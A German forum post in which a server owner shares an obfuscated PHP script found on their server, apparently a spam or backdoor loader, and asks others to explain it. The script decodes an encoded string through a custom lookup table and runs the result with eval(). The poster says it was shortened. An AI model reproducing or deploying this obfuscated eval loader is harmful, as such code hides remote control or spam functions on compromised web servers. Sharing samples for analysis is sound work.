Hallo,
ich habe auf meinen Server ein PHP-Script gefunden. Ich vermute es ist ein Spam-Script.
Ich habe das Script gekürzt, damit es niemand verwenden kann.
Kann mir das jemand erläutern****?
ich habe auf meinen Server ein PHP-Script gefunden. Ich vermute es ist ein Spam-Script.
Ich habe das Script gekürzt, damit es niemand verwenden kann.
Kann mir das jemand erläutern****?
PHP:
<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(]({(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+`(:+|(,)](:({(]+`(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:(`(]+`(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+`(,+`(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+`(:(](.(,(]-^+_(-(`(,({(`(^(`(^(.+`(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:(`(.+_(-(,(:(.(,+_(--^(:)](`-^(]+|(:(_(^-^+_(-(`(,(`(:-^(,(_(,-_(.+{(,-_(.)](`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:(_+_(-+`(:(_(,(](_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+`(:(_(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+`(](_+_(-(`(,(^(`(^(`(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-(`(](:(`(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+`(^(:(,+`(,(.(.+_(-(.,&+_(-)](`+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+`(:+|(,(_(,-_(.+{(,-_(.)](`+_(-(](`(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+`(,-^(,(:(:(:(.+`(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+`(,-^(,(:(:(:(.+`(:(^(.(,(,(.(.-_(:+`(,(`+_(-+`(^(:(,+`(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+`(](_+_(-(`(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+`(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:(`+_(-({+_(-+`(^(:(,+`(,-^(:+_(-(`(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-(`+_(-(:(:(`(:+`(^(,(`(:(,(](.(^(`(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+`(.+{(.(,(,+`(.+|(^+`+_(-(:(,)](:-^(:+|(],&(`+`(^+_(-(:(`(^+|(](](_+`(^(^+_(-+`(,-^(:+_(-(:(.(]+`(:+`(,+|(_+`(.+_(-(,-^(_(^(^(^+_(-(:(,(^(`(.(:+`(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`(](](_(,+`(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:(`(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^(`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+`(.)](^+`(^(^(](`+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-(`+_(-(:(:+{(.+`+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+`(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_(`-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+`+_(-(`(.,&(^(`(,+_(-(:(](:+{(:(`(,(:(,+|(,,&(.-_(.(.(:(](.(](^+`+_(--^(](.(`+{(_(.(_(,(:+`(,+|(_(.(`(`(,({(.(](^({(.,&(,({(:,&(:(`(,+|(:+`(,,&(_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:(`(.,&(]+`(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+`(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^(`(.(.+_(-(:(^(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,+_(-+_(-(:+`(,+|(_(.(:-^(,+`(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,(`+_(-)](:+|(`+_(-(.+`(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,(](:(_({+_(-(`(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_(`+`+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.(`(:(^(.+{(:+`(,(`(_,&+_(--_(])]+_(-)](:(`(.,&+_(--_(.+_(-(,(](_(.(`(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)](`-^(,(_(:+|(,)](.+{(:+`(:(](:(:(^(`+_(--^+_(--^(:(.(,-^(_,&+_(-+_(-(^(.(]+|(`-^(`,&(,)](`+`(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_(`(`(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_(`(`(,+{+_(-+_(-(_(.(:(_(_+|(,,&(`({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+`(,+`(.+_(-(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+{+_(-(,(.+`(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+`(]-_(:+_(-(`(,(^+_(-(.-^(_(,(](:(:(:(,(`(:(_(^(:+_(-+{(,,&(`+`(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({(`+{(_(.+_(-(`(^)](_(:(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|+_(-)](.(.(:(:(,(`(.)](_)]+_(-(`+_(-(:(:(`(:+`(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+`+_(--^(:(](:(`(.+_(-(,-_(:(,(](.(_-^(:(^(](.(`-^(]+{(`({(_(.(:(`(:(^+_(-)](:(_(,(:(.+|(`-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:(`(:(,(,+|(`+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+`(:(_(,(](_(:(.,&+_(-(:+_(-+`(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(:(,+`(,-^(:+_(-(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,(`(`(,(](`(`(`+_(-(:({(.-_(`+|(.(](,(,+_(-(`(_-_+_(-({(:({(:({+_(-(:(:+|(]+|(`-^(:+|(^(_(,({(_-_(`,&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+`(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.(`+`(`,&(,)](`+`(](:(:+_(-(`(.(,({(`({+_(-(.(.,&(:+{+_(-,&(,+`(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(.(*,^(:)^(*-(,_)`(*,+,_(+(*,^,_)^(*,,,_)`(*,+,_(`(*-(,_)^,,,|-((.(*,|)`)&)^(*,|)_(*,,,_)^(*,|(^)`(*,^,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`,:,,(.(*-(,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)`*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`-(,+-*-+-(,{(.(*,*(:)^-`(-(:)^-`(*,*)`*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>